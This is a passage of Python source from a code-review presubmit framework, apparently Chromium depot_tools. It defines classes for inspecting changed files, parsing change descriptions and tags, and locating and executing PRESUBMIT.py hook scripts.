raise Exception('patchset %s doesn\'t exist in issue %s' % (
patchset, issue))
else:
rev = info['current_revision']
rev_info = info['revisions'][rev]
return rev_info['commit']['message']
def GetDestRef(self, issue):
ref = self.GetChangeInfo(issue)['branch']
if not ref.startswith('refs/'):
# NOTE: it is possible to create 'refs/x' branch,
# aka 'refs/heads/refs/x'. However, this is ill-advised.
ref = 'refs/heads/%s' % ref
return ref
def _GetApproversForLabel(self, issue, label):
change_info = self.GetChangeInfo(issue)
label_info = change_info.get('labels', {}).get(label, {})
values = label_info.get('values', {}).keys()
if not values:
return []
max_value = max(int(v) for v in values)
return [v for v in label_info.get('all', [])
if v.get('value', 0) == max_value]
def IsBotCommitApproved(self, issue):
return bool(self._GetApproversForLabel(issue, 'Bot-Commit'))
def IsOwnersOverrideApproved(self, issue):
return bool(self._GetApproversForLabel(issue, 'Owners-Override'))
def GetChangeOwner(self, issue):
return self.GetChangeInfo(issue)['owner']['email']
def GetChangeReviewers(self, issue, approving_only=True):
changeinfo = self.GetChangeInfo(issue)
if approving_only:
reviewers = self._GetApproversForLabel(issue, 'Code-Review')
else:
reviewers = changeinfo.get('reviewers', {}).get('REVIEWER', [])
return [r.get('email') for r in reviewers]
def UpdateDescription(self, description, issue):
gerrit_util.SetCommitMessage(self.host, issue, description, notify='NONE')
def IsCodeOwnersEnabledOnRepo(self):
if self.code_owners_enabled is None:
self.code_owners_enabled = gerrit_util.IsCodeOwnersEnabledOnRepo(
self.host, self.project)
return self.code_owners_enabled
class OutputApi(object):
"""An instance of OutputApi gets passed to presubmit scripts so that they
can output various types of results.
"""
PresubmitResult = _PresubmitResult
PresubmitError = _PresubmitError
PresubmitPromptWarning = _PresubmitPromptWarning
PresubmitNotifyResult = _PresubmitNotifyResult
MailTextResult = _MailTextResult
def __init__(self, is_committing):
self.is_committing = is_committing
self.more_cc = []
def AppendCC(self, cc):
"""Appends a user to cc for this change."""
self.more_cc.append(cc)
def PresubmitPromptOrNotify(self, *args, **kwargs):
"""Warn the user when uploading, but only notify if committing."""
if self.is_committing:
return self.PresubmitNotifyResult(*args, **kwargs)
return self.PresubmitPromptWarning(*args, **kwargs)
class InputApi(object):
"""An instance of this object is passed to presubmit scripts so they can
know stuff about the change they're looking at.
"""
# Method could be a function
# pylint: disable=no-self-use
# File extensions that are considered source files from a style guide
# perspective. Don't modify this list from a presubmit script!
#
# Files without an extension aren't included in the list. If you want to
# filter them as source files, add r'(^|.*?[\\\/])[^.]+$' to the allow list.
# Note that ALL CAPS files are skipped in DEFAULT_FILES_TO_SKIP below.
DEFAULT_FILES_TO_CHECK = (
# C++ and friends
r'.+\.c$', r'.+\.cc$', r'.+\.cpp$', r'.+\.h$', r'.+\.m$', r'.+\.mm$',
r'.+\.inl$', r'.+\.asm$', r'.+\.hxx$', r'.+\.hpp$', r'.+\.s$', r'.+\.S$',
# Scripts
r'.+\.js$', r'.+\.py$', r'.+\.sh$', r'.+\.rb$', r'.+\.pl$', r'.+\.pm$',
# Other
r'.+\.java$', r'.+\.mk$', r'.+\.am$', r'.+\.css$', r'.+\.mojom$',
r'.+\.fidl$'
)
# Path regexp that should be excluded from being considered containing source
# files. Don't modify this list from a presubmit script!
DEFAULT_FILES_TO_SKIP = (
r'testing_support[\\\/]google_appengine[\\\/].*',
r'.*\bexperimental[\\\/].*',
# Exclude third_party/.* but NOT third_party/{WebKit,blink}
# (crbug.com/539768 and crbug.com/836555).
r'.*\bthird_party[\\\/](?!(WebKit|blink)[\\\/]).*',
# Output directories (just in case)
r'.*\bDebug[\\\/].*',
r'.*\bRelease[\\\/].*',
r'.*\bxcodebuild[\\\/].*',
r'.*\bout[\\\/].*',
# All caps files like README and LICENCE.
r'.*\b[A-Z0-9_]{2,}$',
# SCM (can happen in dual SCM configuration). (Slightly over aggressive)
r'(|.*[\\\/])\.git[\\\/].*',
r'(|.*[\\\/])\.svn[\\\/].*',
# There is no point in processing a patch file.
r'.+\.diff$',
r'.+\.patch$',
)
# TODO(https://crbug.com/1098562): Remove once no longer used
@property
def DEFAULT_WHITE_LIST(self):
return self.DEFAULT_FILES_TO_CHECK
# TODO(https://crbug.com/1098562): Remove once no longer used
@DEFAULT_WHITE_LIST.setter
def DEFAULT_WHITE_LIST(self, value):
self.DEFAULT_FILES_TO_CHECK = value
# TODO(https://crbug.com/1098562): Remove once no longer used
@property
def DEFAULT_ALLOW_LIST(self):
return self.DEFAULT_FILES_TO_CHECK
# TODO(https://crbug.com/1098562): Remove once no longer used
@DEFAULT_ALLOW_LIST.setter
def DEFAULT_ALLOW_LIST(self, value):
self.DEFAULT_FILES_TO_CHECK = value
# TODO(https://crbug.com/1098562): Remove once no longer used
@property
def DEFAULT_BLACK_LIST(self):
return self.DEFAULT_FILES_TO_SKIP
# TODO(https://crbug.com/1098562): Remove once no longer used
@DEFAULT_BLACK_LIST.setter
def DEFAULT_BLACK_LIST(self, value):
self.DEFAULT_FILES_TO_SKIP = value
# TODO(https://crbug.com/1098562): Remove once no longer used
@property
def DEFAULT_BLOCK_LIST(self):
return self.DEFAULT_FILES_TO_SKIP
# TODO(https://crbug.com/1098562): Remove once no longer used
@DEFAULT_BLOCK_LIST.setter
def DEFAULT_BLOCK_LIST(self, value):
self.DEFAULT_FILES_TO_SKIP = value
def __init__(self, change, presubmit_path, is_committing,
verbose, gerrit_obj, dry_run=None, thread_pool=None, parallel=False):
"""Builds an InputApi object.
Args:
change: A presubmit.Change object.
presubmit_path: The path to the presubmit script being processed.
is_committing: True if the change is about to be committed.
gerrit_obj: provides basic Gerrit codereview functionality.
dry_run: if true, some Checks will be skipped.
parallel: if true, all tests reported via input_api.RunTests for all
PRESUBMIT files will be run in parallel.
"""
# Version number of the presubmit_support script.
self.version = [int(x) for x in __version__.split('.')]
self.change = change
self.is_committing = is_committing
self.gerrit = gerrit_obj
self.dry_run = dry_run
self.parallel = parallel
self.thread_pool = thread_pool or ThreadPool()
# We expose various modules and functions as attributes of the input_api
# so that presubmit scripts don't have to import them.
self.ast = ast
self.basename = os.path.basename
self.cpplint = cpplint
self.fnmatch = fnmatch
self.gclient_paths = gclient_paths
# TODO(yyanagisawa): stop exposing this when python3 become default.
# Since python3's tempfile has TemporaryDirectory, we do not need this.
self.temporary_directory = gclient_utils.temporary_directory
self.glob = glob.glob
self.json = json
self.logging = logging.getLogger('PRESUBMIT')
self.os_listdir = os.listdir
self.os_path = os.path
self.os_stat = os.stat
self.os_walk = os.walk
self.re = re
self.subprocess = subprocess
self.sys = sys
self.tempfile = tempfile
self.time = time
self.unittest = unittest
if sys.version_info.major == 2:
self.urllib2 = urllib2
self.urllib_request = urllib_request
self.urllib_error = urllib_error
self.is_windows = sys.platform == 'win32'
# Set python_executable to 'vpython' in order to allow scripts in other
# repos (e.g. src.git) to automatically pick up that repo's .vpython file,
# instead of inheriting the one in depot_tools.
self.python_executable = 'vpython'
# Offer a python 3 executable for use during the migration off of python 2.
self.python3_executable = 'vpython3'
self.environ = os.environ
# InputApi.platform is the platform you're currently running on.
self.platform = sys.platform
self.cpu_count = multiprocessing.cpu_count()
# The local path of the currently-being-processed presubmit script.
self._current_presubmit_path = os.path.dirname(presubmit_path)
# We carry the canned checks so presubmit scripts can easily use them.
self.canned_checks = presubmit_canned_checks
# Temporary files we must manually remove at the end of a run.
self._named_temporary_files = []
self.owners_client = None
if self.gerrit:
self.owners_client = owners_client.GetCodeOwnersClient(
root=change.RepositoryRoot(),
upstream=change.UpstreamBranch(),
host=self.gerrit.host,
project=self.gerrit.project,
branch=self.gerrit.branch)
self.owners_db = owners_db.Database(
change.RepositoryRoot(), fopen=open, os_path=self.os_path)
self.owners_finder = owners_finder.OwnersFinder
self.verbose = verbose
self.Command = CommandData
# Replace <hash_map> and <hash_set> as headers that need to be included
# with 'base/containers/hash_tables.h' instead.
# Access to a protected member _XX of a client class
# pylint: disable=protected-access
self.cpplint._re_pattern_templates = [
(a, b, 'base/containers/hash_tables.h')
if header in ('<hash_map>', '<hash_set>') else (a, b, header)
for (a, b, header) in cpplint._re_pattern_templates
]
def SetTimeout(self, timeout):
self.thread_pool.timeout = timeout
def PresubmitLocalPath(self):
"""Returns the local path of the presubmit script currently being run.
This is useful if you don't want to hard-code absolute paths in the
presubmit script. For example, It can be used to find another file
relative to the PRESUBMIT.py script, so the whole tree can be branched and
the presubmit script still works, without editing its content.
"""
return self._current_presubmit_path
def AffectedFiles(self, include_deletes=True, file_filter=None):
"""Same as input_api.change.AffectedFiles() except only lists files
(and optionally directories) in the same directory as the current presubmit
script, or subdirectories thereof. Note that files are listed using the OS
path separator, so backslashes are used as separators on Windows.
"""
dir_with_slash = normpath('%s/' % self.PresubmitLocalPath())
if len(dir_with_slash) == 1:
dir_with_slash = ''
return list(filter(
lambda x: normpath(x.AbsoluteLocalPath()).startswith(dir_with_slash),
self.change.AffectedFiles(include_deletes, file_filter)))
def LocalPaths(self):
"""Returns local paths of input_api.AffectedFiles()."""
paths = [af.LocalPath() for af in self.AffectedFiles()]
logging.debug('LocalPaths: %s', paths)
return paths
def AbsoluteLocalPaths(self):
"""Returns absolute local paths of input_api.AffectedFiles()."""
return [af.AbsoluteLocalPath() for af in self.AffectedFiles()]
def AffectedTestableFiles(self, include_deletes=None, **kwargs):
"""Same as input_api.change.AffectedTestableFiles() except only lists files
in the same directory as the current presubmit script, or subdirectories
thereof.
"""
if include_deletes is not None:
warn('AffectedTestableFiles(include_deletes=%s)'
' is deprecated and ignored' % str(include_deletes),
category=DeprecationWarning,
stacklevel=2)
return list(filter(
lambda x: x.IsTestableFile(),
self.AffectedFiles(include_deletes=False, **kwargs)))
def AffectedTextFiles(self, include_deletes=None):
"""An alias to AffectedTestableFiles for backwards compatibility."""
return self.AffectedTestableFiles(include_deletes=include_deletes)
def FilterSourceFile(self,
affected_file,
files_to_check=None,
files_to_skip=None,
allow_list=None,
block_list=None):
"""Filters out files that aren't considered 'source file'.
If files_to_check or files_to_skip is None, InputApi.DEFAULT_FILES_TO_CHECK
and InputApi.DEFAULT_FILES_TO_SKIP is used respectively.
The lists will be compiled as regular expression and
AffectedFile.LocalPath() needs to pass both list.
Note: Copy-paste this function to suit your needs or use a lambda function.
"""
if files_to_check is None:
files_to_check = self.DEFAULT_FILES_TO_CHECK
if files_to_skip is None:
files_to_skip = self.DEFAULT_FILES_TO_SKIP
def Find(affected_file, items):
local_path = affected_file.LocalPath()
for item in items:
if self.re.match(item, local_path):
return True
return False
return (Find(affected_file, files_to_check) and
not Find(affected_file, files_to_skip))
def AffectedSourceFiles(self, source_file):
"""Filter the list of AffectedTestableFiles by the function source_file.
If source_file is None, InputApi.FilterSourceFile() is used.
"""
if not source_file:
source_file = self.FilterSourceFile
return list(filter(source_file, self.AffectedTestableFiles()))
def RightHandSideLines(self, source_file_filter=None):
"""An iterator over all text lines in 'new' version of changed files.
Only lists lines from new or modified text files in the change that are
contained by the directory of the currently executing presubmit script.
This is useful for doing line-by-line regex checks, like checking for
trailing whitespace.
Yields:
a 3 tuple:
the AffectedFile instance of the current file;
integer line number (1-based); and
the contents of the line as a string.
Note: The carriage return (LF or CR) is stripped off.
"""
files = self.AffectedSourceFiles(source_file_filter)
return _RightHandSideLinesImpl(files)
def ReadFile(self, file_item, mode='r'):
"""Reads an arbitrary file.
Deny reading anything outside the repository.
"""
if isinstance(file_item, AffectedFile):
file_item = file_item.AbsoluteLocalPath()
if not file_item.startswith(self.change.RepositoryRoot()):
raise IOError('Access outside the repository root is denied.')
return gclient_utils.FileRead(file_item, mode)
def CreateTemporaryFile(self, **kwargs):
"""Returns a named temporary file that must be removed with a call to
RemoveTemporaryFiles().
All keyword arguments are forwarded to tempfile.NamedTemporaryFile(),
except for |delete|, which is always set to False.
Presubmit checks that need to create a temporary file and pass it for
reading should use this function instead of NamedTemporaryFile(), as
Windows fails to open a file that is already open for writing.
with input_api.CreateTemporaryFile() as f:
f.write('xyz')
f.close()
input_api.subprocess.check_output(['script-that', '--reads-from',
f.name])
Note that callers of CreateTemporaryFile() should not worry about removing
any temporary file; this is done transparently by the presubmit handling
code.
"""
if 'delete' in kwargs:
# Prevent users from passing |delete|; we take care of file deletion
# ourselves and this prevents unintuitive error messages when we pass
# delete=False and 'delete' is also in kwargs.
raise TypeError('CreateTemporaryFile() does not take a "delete" '
'argument, file deletion is handled automatically by '
'the same presubmit_support code that creates InputApi '
'objects.')
temp_file = self.tempfile.NamedTemporaryFile(delete=False, **kwargs)
self._named_temporary_files.append(temp_file.name)
return temp_file
@property
def tbr(self):
"""Returns if a change is TBR'ed."""
return 'TBR' in self.change.tags or self.change.TBRsFromDescription()
def RunTests(self, tests_mix, parallel=True):
tests = []
msgs = []
for t in tests_mix:
if isinstance(t, OutputApi.PresubmitResult) and t:
msgs.append(t)
else:
assert issubclass(t.message, _PresubmitResult)
tests.append(t)
if self.verbose:
t.info = _PresubmitNotifyResult
if not t.kwargs.get('cwd'):
t.kwargs['cwd'] = self.PresubmitLocalPath()
self.thread_pool.AddTests(tests, parallel)
# When self.parallel is True (i.e. --parallel is passed as an option)
# RunTests doesn't actually run tests. It adds them to a ThreadPool that
# will run all tests once all PRESUBMIT files are processed.
# Otherwise, it will run them and return the results.
if not self.parallel:
msgs.extend(self.thread_pool.RunAsync())
return msgs
class _DiffCache(object):
"""Caches diffs retrieved from a particular SCM."""
def __init__(self, upstream=None):
"""Stores the upstream revision against which all diffs will be computed."""
self._upstream = upstream
def GetDiff(self, path, local_root):
"""Get the diff for a particular path."""
raise NotImplementedError()
def GetOldContents(self, path, local_root):
"""Get the old version for a particular path."""
raise NotImplementedError()
class _GitDiffCache(_DiffCache):
"""DiffCache implementation for git; gets all file diffs at once."""
def __init__(self, upstream):
super(_GitDiffCache, self).__init__(upstream=upstream)
self._diffs_by_file = None
def GetDiff(self, path, local_root):
if not self._diffs_by_file:
# Compute a single diff for all files and parse the output; should
# with git this is much faster than computing one diff for each file.
diffs = {}
# Don't specify any filenames below, because there are command line length
# limits on some platforms and GenerateDiff would fail.
unified_diff = scm.GIT.GenerateDiff(local_root, files=[], full_move=True,
branch=self._upstream)
# This regex matches the path twice, separated by a space. Note that
# filename itself may contain spaces.
file_marker = re.compile('^diff --git (?P<filename>.*) (?P=filename)$')
current_diff = []
keep_line_endings = True
for x in unified_diff.splitlines(keep_line_endings):
match = file_marker.match(x)
if match:
# Marks the start of a new per-file section.
diffs[match.group('filename')] = current_diff = [x]
elif x.startswith('diff --git'):
raise PresubmitFailure('Unexpected diff line: %s' % x)
else:
current_diff.append(x)
self._diffs_by_file = dict(
(normpath(path), ''.join(diff)) for path, diff in diffs.items())
if path not in self._diffs_by_file:
raise PresubmitFailure(
'Unified diff did not contain entry for file %s' % path)
return self._diffs_by_file[path]
def GetOldContents(self, path, local_root):
return scm.GIT.GetOldContents(local_root, path, branch=self._upstream)
class AffectedFile(object):
"""Representation of a file in a change."""
DIFF_CACHE = _DiffCache
# Method could be a function
# pylint: disable=no-self-use
def __init__(self, path, action, repository_root, diff_cache):
self._path = path
self._action = action
self._local_root = repository_root
self._is_directory = None
self._cached_changed_contents = None
self._cached_new_contents = None
self._diff_cache = diff_cache
logging.debug('%s(%s)', self.__class__.__name__, self._path)
def LocalPath(self):
"""Returns the path of this file on the local disk relative to client root.
This should be used for error messages but not for accessing files,
because presubmit checks are run with CWD=PresubmitLocalPath() (which is
often != client root).
"""
return normpath(self._path)
def AbsoluteLocalPath(self):
"""Returns the absolute path of this file on the local disk.
"""
return os.path.abspath(os.path.join(self._local_root, self.LocalPath()))
def Action(self):
"""Returns the action on this opened file, e.g. A, M, D, etc."""
return self._action
def IsTestableFile(self):
"""Returns True if the file is a text file and not a binary file.
Deleted files are not text file."""
raise NotImplementedError() # Implement when needed
def IsTextFile(self):
"""An alias to IsTestableFile for backwards compatibility."""
return self.IsTestableFile()
def OldContents(self):
"""Returns an iterator over the lines in the old version of file.
The old version is the file before any modifications in the user's
workspace, i.e. the 'left hand side'.
Contents will be empty if the file is a directory or does not exist.
Note: The carriage returns (LF or CR) are stripped off.
"""
return self._diff_cache.GetOldContents(self.LocalPath(),
self._local_root).splitlines()
def NewContents(self):
"""Returns an iterator over the lines in the new version of file.
The new version is the file in the user's workspace, i.e. the 'right hand
side'.
Contents will be empty if the file is a directory or does not exist.
Note: The carriage returns (LF or CR) are stripped off.
"""
if self._cached_new_contents is None:
self._cached_new_contents = []
try:
self._cached_new_contents = gclient_utils.FileRead(
self.AbsoluteLocalPath(), 'rU').splitlines()
except IOError:
pass # File not found? That's fine; maybe it was deleted.
except UnicodeDecodeError as e:
# log the filename since we're probably trying to read a binary
# file, and shouldn't be.
print('Error reading %s: %s' % (self.AbsoluteLocalPath(), e))
raise
return self._cached_new_contents[:]
def ChangedContents(self, keeplinebreaks=False):
"""Returns a list of tuples (line number, line text) of all new lines.
This relies on the scm diff output describing each changed code section
with a line of the form
^@@ <old line num>,<old size> <new line num>,<new size> @@$
"""
# Don't return cached results when line breaks are requested.
if not keeplinebreaks and self._cached_changed_contents is not None:
return self._cached_changed_contents[:]
result = []
line_num = 0
# The keeplinebreaks parameter to splitlines must be True or else the
# CheckForWindowsLineEndings presubmit will be a NOP.
for line in self.GenerateScmDiff().splitlines(keeplinebreaks):
m = re.match(r'^@@ [0-9\,\+\-]+ \+([0-9]+)\,[0-9]+ @@', line)
if m:
line_num = int(m.groups(1)[0])
continue
if line.startswith('+') and not line.startswith('++'):
result.append((line_num, line[1:]))
if not line.startswith('-'):
line_num += 1
# Don't cache results with line breaks.
if keeplinebreaks:
return result;
self._cached_changed_contents = result
return self._cached_changed_contents[:]
def __str__(self):
return self.LocalPath()
def GenerateScmDiff(self):
return self._diff_cache.GetDiff(self.LocalPath(), self._local_root)
class GitAffectedFile(AffectedFile):
"""Representation of a file in a change out of a git checkout."""
# Method 'NNN' is abstract in class 'NNN' but is not overridden
# pylint: disable=abstract-method
DIFF_CACHE = _GitDiffCache
def __init__(self, *args, **kwargs):
AffectedFile.__init__(self, *args, **kwargs)
self._server_path = None
self._is_testable_file = None
def IsTestableFile(self):
if self._is_testable_file is None:
if self.Action() == 'D':
# A deleted file is not testable.
self._is_testable_file = False
else:
self._is_testable_file = os.path.isfile(self.AbsoluteLocalPath())
return self._is_testable_file
class Change(object):
"""Describe a change.
Used directly by the presubmit scripts to query the current change being
tested.
Instance members:
tags: Dictionary of KEY=VALUE pairs found in the change description.
self.KEY: equivalent to tags['KEY']
"""
_AFFECTED_FILES = AffectedFile
# Matches key/value (or 'tag') lines in changelist descriptions.
TAG_LINE_RE = re.compile(
'^[ \t]*(?P<key>[A-Z][A-Z_0-9]*)[ \t]*=[ \t]*(?P<value>.*?)[ \t]*$')
scm = ''
def __init__(
self, name, description, local_root, files, issue, patchset, author,
upstream=None):
if files is None:
files = []
self._name = name
# Convert root into an absolute path.
self._local_root = os.path.abspath(local_root)
self._upstream = upstream
self.issue = issue
self.patchset = patchset
self.author_email = author
self._full_description = ''
self.tags = {}
self._description_without_tags = ''
self.SetDescriptionText(description)
assert all(
(isinstance(f, (list, tuple)) and len(f) == 2) for f in files), files
diff_cache = self._AFFECTED_FILES.DIFF_CACHE(self._upstream)
self._affected_files = [
self._AFFECTED_FILES(path, action.strip(), self._local_root, diff_cache)
for action, path in files
]
def UpstreamBranch(self):
"""Returns the upstream branch for the change."""
return self._upstream
def Name(self):
"""Returns the change name."""
return self._name
def DescriptionText(self):
"""Returns the user-entered changelist description, minus tags.
Any line in the user-provided description starting with e.g. 'FOO='
(whitespace permitted before and around) is considered a tag line. Such
lines are stripped out of the description this function returns.
"""
return self._description_without_tags
def FullDescriptionText(self):
"""Returns the complete changelist description including tags."""
return self._full_description
def SetDescriptionText(self, description):
"""Sets the full description text (including tags) to |description|.
Also updates the list of tags."""
self._full_description = description
# From the description text, build up a dictionary of key/value pairs
# plus the description minus all key/value or 'tag' lines.
description_without_tags = []
self.tags = {}
for line in self._full_description.splitlines():
m = self.TAG_LINE_RE.match(line)
if m:
self.tags[m.group('key')] = m.group('value')
else:
description_without_tags.append(line)
# Change back to text and remove whitespace at end.
self._description_without_tags = (
'\n'.join(description_without_tags).rstrip())
def AddDescriptionFooter(self, key, value):
"""Adds the given footer to the change description.
Args:
key: A string with the key for the git footer. It must conform to
the git footers format (i.e. 'List-Of-Tokens') and will be case
normalized so that each token is title-cased.
value: A string with the value for the git footer.
"""
description = git_footers.add_footer(
self.FullDescriptionText(), git_footers.normalize_name(key), value)
self.SetDescriptionText(description)
def RepositoryRoot(self):
"""Returns the repository (checkout) root directory for this change,
as an absolute path.
"""
return self._local_root
def __getattr__(self, attr):
"""Return tags directly as attributes on the object."""
if not re.match(r'^[A-Z_]*$', attr):
raise AttributeError(self, attr)
return self.tags.get(attr)
def GitFootersFromDescription(self):
"""Return the git footers present in the description.
Returns:
footers: A dict of {footer: [values]} containing a multimap of the footers
in the change description.
"""
return git_footers.parse_footers(self.FullDescriptionText())
def BugsFromDescription(self):
"""Returns all bugs referenced in the commit description."""
tags = [b.strip() for b in self.tags.get('BUG', '').split(',') if b.strip()]
footers = []
parsed = self.GitFootersFromDescription()
unsplit_footers = parsed.get('Bug', []) + parsed.get('Fixed', [])
for unsplit_footer in unsplit_footers:
footers += [b.strip() for b in unsplit_footer.split(',')]
return sorted(set(tags + footers))
def ReviewersFromDescription(self):
"""Returns all reviewers listed in the commit description."""
# We don't support a 'R:' git-footer for reviewers; that is in metadata.
tags = [r.strip() for r in self.tags.get('R', '').split(',') if r.strip()]
return sorted(set(tags))
def TBRsFromDescription(self):
"""Returns all TBR reviewers listed in the commit description."""
tags = [r.strip() for r in self.tags.get('TBR', '').split(',') if r.strip()]
# TODO(crbug.com/839208): Remove support for 'Tbr:' when TBRs are
# programmatically determined by self-CR+1s.
footers = self.GitFootersFromDescription().get('Tbr', [])
return sorted(set(tags + footers))
# TODO(crbug.com/753425): Delete these once we're sure they're unused.
@property
def BUG(self):
return ','.join(self.BugsFromDescription())
@property
def R(self):
return ','.join(self.ReviewersFromDescription())
@property
def TBR(self):
return ','.join(self.TBRsFromDescription())
def AllFiles(self, root=None):
"""List all files under source control in the repo."""
raise NotImplementedError()
def AffectedFiles(self, include_deletes=True, file_filter=None):
"""Returns a list of AffectedFile instances for all files in the change.
Args:
include_deletes: If false, deleted files will be filtered out.
file_filter: An additional filter to apply.
Returns:
[AffectedFile(path, action), AffectedFile(path, action)]
"""
affected = list(filter(file_filter, self._affected_files))
if include_deletes:
return affected
return list(filter(lambda x: x.Action() != 'D', affected))
def AffectedTestableFiles(self, include_deletes=None, **kwargs):
"""Return a list of the existing text files in a change."""
if include_deletes is not None:
warn('AffectedTeestableFiles(include_deletes=%s)'
' is deprecated and ignored' % str(include_deletes),
category=DeprecationWarning,
stacklevel=2)
return list(filter(
lambda x: x.IsTestableFile(),
self.AffectedFiles(include_deletes=False, **kwargs)))
def AffectedTextFiles(self, include_deletes=None):
"""An alias to AffectedTestableFiles for backwards compatibility."""
return self.AffectedTestableFiles(include_deletes=include_deletes)
def LocalPaths(self):
"""Convenience function."""
return [af.LocalPath() for af in self.AffectedFiles()]
def AbsoluteLocalPaths(self):
"""Convenience function."""
return [af.AbsoluteLocalPath() for af in self.AffectedFiles()]
def RightHandSideLines(self):
"""An iterator over all text lines in 'new' version of changed files.
Lists lines from new or modified text files in the change.
This is useful for doing line-by-line regex checks, like checking for
trailing whitespace.
Yields:
a 3 tuple:
the AffectedFile instance of the current file;
integer line number (1-based); and
the contents of the line as a string.
"""
return _RightHandSideLinesImpl(
x for x in self.AffectedFiles(include_deletes=False)
if x.IsTestableFile())
def OriginalOwnersFiles(self):
"""A map from path names of affected OWNERS files to their old content."""
def owners_file_filter(f):
return 'OWNERS' in os.path.split(f.LocalPath())[1]
files = self.AffectedFiles(file_filter=owners_file_filter)
return dict([(f.LocalPath(), f.OldContents()) for f in files])
class GitChange(Change):
_AFFECTED_FILES = GitAffectedFile
scm = 'git'
def AllFiles(self, root=None):
"""List all files under source control in the repo."""
root = root or self.RepositoryRoot()
return subprocess.check_output(
['git', '-c', 'core.quotePath=false', 'ls-files', '--', '.'],
cwd=root).splitlines()
def ListRelevantPresubmitFiles(files, root):
"""Finds all presubmit files that apply to a given set of source files.
If inherit-review-settings-ok is present right under root, looks for
PRESUBMIT.py in directories enclosing root.
Args:
files: An iterable container containing file paths.
root: Path where to stop searching.
Return:
List of absolute paths of the existing PRESUBMIT.py scripts.
"""
files = [normpath(os.path.join(root, f)) for f in files]
# List all the individual directories containing files.
directories = set([os.path.dirname(f) for f in files])
# Ignore root if inherit-review-settings-ok is present.
if os.path.isfile(os.path.join(root, 'inherit-review-settings-ok')):
root = None
# Collect all unique directories that may contain PRESUBMIT.py.
candidates = set()
for directory in directories:
while True:
if directory in candidates:
break
candidates.add(directory)
if directory == root:
break
parent_dir = os.path.dirname(directory)
if parent_dir == directory:
# We hit the system root directory.
break
directory = parent_dir
# Look for PRESUBMIT.py in all candidate directories.
results = []
for directory in sorted(list(candidates)):
try:
for f in os.listdir(directory):
p = os.path.join(directory, f)
if os.path.isfile(p) and re.match(
r'PRESUBMIT.*\.py$', f) and not f.startswith('PRESUBMIT_test'):
results.append(p)
except OSError:
pass
logging.debug('Presubmit files: %s', ','.join(results))
return results
class GetTryMastersExecuter(object):
@staticmethod
def ExecPresubmitScript(script_text, presubmit_path, project, change):
"""Executes GetPreferredTryMasters() from a single presubmit script.
Args:
script_text: The text of the presubmit script.
presubmit_path: Project script to run.
project: Project name to pass to presubmit script for bot selection.
Return:
A map of try masters to map of builders to set of tests.
"""
context = {}
try:
exec(compile(script_text, 'PRESUBMIT.py', 'exec', dont_inherit=True),
context)
except Exception as e:
raise PresubmitFailure('"%s" had an exception.\n%s'
% (presubmit_path, e))
function_name = 'GetPreferredTryMasters'
if function_name not in context:
return {}
get_preferred_try_masters = context[function_name]
if not len(inspect.getargspec(get_preferred_try_masters)[0]) == 2:
raise PresubmitFailure(
'Expected function "GetPreferredTryMasters" to take two arguments.')
return get_preferred_try_masters(project, change)
class GetPostUploadExecuter(object):
@staticmethod
def ExecPresubmitScript(script_text, presubmit_path, gerrit_obj, change):
"""Executes PostUploadHook() from a single presubmit script.
Args:
script_text: The text of the presubmit script.
presubmit_path: Project script to run.
gerrit_obj: The GerritAccessor object.
change: The Change object.
Return:
A list of results objects.
"""
context = {}
try:
exec(compile(script_text, 'PRESUBMIT.py', 'exec', dont_inherit=True),
context)
except Exception as e:
raise PresubmitFailure('"%s" had an exception.\n%s'
% (presubmit_path, e))
function_name = 'PostUploadHook'
if function_name not in context:
return {}
post_upload_hook = context[function_name]
if not len(inspect.getargspec(post_upload_hook)[0]) == 3:
raise PresubmitFailure(
'Expected function "PostUploadHook" to take three arguments.')
return post_upload_hook(gerrit_obj, change, OutputApi(False))
def _MergeMasters(masters1, masters2):
"""Merges two master maps. Merges also the tests of each builder."""
result = {}
for (master, builders) in itertools.chain(masters1.items(),
masters2.items()):
new_builders = result.setdefault(master, {})
for (builder, tests) in builders.items():
new_builders.setdefault(builder, set([])).update(tests)
return result
def DoGetTryMasters(change,
changed_files,
repository_root,
default_presubmit,
project,
verbose,
output_stream):
"""Get the list of try masters from the presubmit scripts.
Args:
changed_files: List of modified files.
repository_root: The repository root.
default_presubmit: A default presubmit script to execute in any case.
project: Optional name of a project used in selecting trybots.
verbose: Prints debug info.
output_stream: A stream to write debug output to.
Return:
Map of try masters to map of builders to set of tests.
"""
presubmit_files = ListRelevantPresubmitFiles(changed_files, repository_root)
if not presubmit_files and verbose:
output_stream.write('Warning, no PRESUBMIT.py found.\n')
results = {}
executer = GetTryMastersExecuter()
if default_presubmit:
if verbose:
output_stream.write('Running default presubmit script.\n')
fake_path = os.path.join(repository_root, 'PRESUBMIT.py')
results = _MergeMasters(results, executer.ExecPresubmitScript(
default_presubmit, fake_path, project, change))
for filename in presubmit_files:
filename = os.path.abspath(filename)
if verbose:
output_stream.write('Running %s\n' % filename)
# Accept CRLF presubmit script.
presubmit_script = gclient_utils.FileRead(filename, 'rU')
results = _MergeMasters(results, executer.ExecPresubmitScript(
presubmit_script, filename, project, change))
# Make sets to lists again for later JSON serialization.
for builders in results.values():
for builder in builders:
builders[builder] = list(builders[builder])
if results and verbose:
output_stream.write('%s\n' % str(results))
return results
def DoPostUploadExecuter(change,
gerrit_obj,
verbose):
"""Execute the post upload hook.
Args:
change: The Change object.
gerrit_obj: The GerritAccessor object.
verbose: Prints debug info.
"""
presubmit_files = ListRelevantPresubmitFiles(
change.LocalPaths(), change.RepositoryRoot())
if not presubmit_files and verbose:
sys.stdout.write('Warning, no PRESUBMIT.py found.\n')
results = []
executer = GetPostUploadExecuter()
# The root presubmit file should be executed after the ones in subdirectories.
# i.e. the specific post upload hooks should run before the general ones.
# Thus, reverse the order provided by ListRelevantPresubmitFiles.
presubmit_files.reverse()
for filename in presubmit_files:
filename = os.path.abspath(filename)
if verbose:
sys.stdout.write('Running %s\n' % filename)
# Accept CRLF presubmit script.
presubmit_script = gclient_utils.FileRead(filename, 'rU')
results.extend(executer.ExecPresubmitScript(
presubmit_script, filename, gerrit_obj, change))
if not results:
return 0
sys.stdout.write('\n')
sys.stdout.write('** Post Upload Hook Messages **\n')
exit_code = 0
for result in results:
if result.fatal:
exit_code = 1
result.handle()
sys.stdout.write('\n')
return exit_code
class PresubmitExecuter(object):
def __init__(self, change, committing, verbose, gerrit_obj, dry_run=None,
thread_pool=None, parallel=False):
"""
Args:
change: The Change object.
committing: True if 'git cl land' is running, False if 'git cl upload' is.
gerrit_obj: provides basic Gerrit codereview functionality.
dry_run: if true, some Checks will be skipped.
parallel: if true, all tests reported via input_api.RunTests for all
PRESUBMIT files will be run in parallel.
"""
self.change = change
self.committing = committing
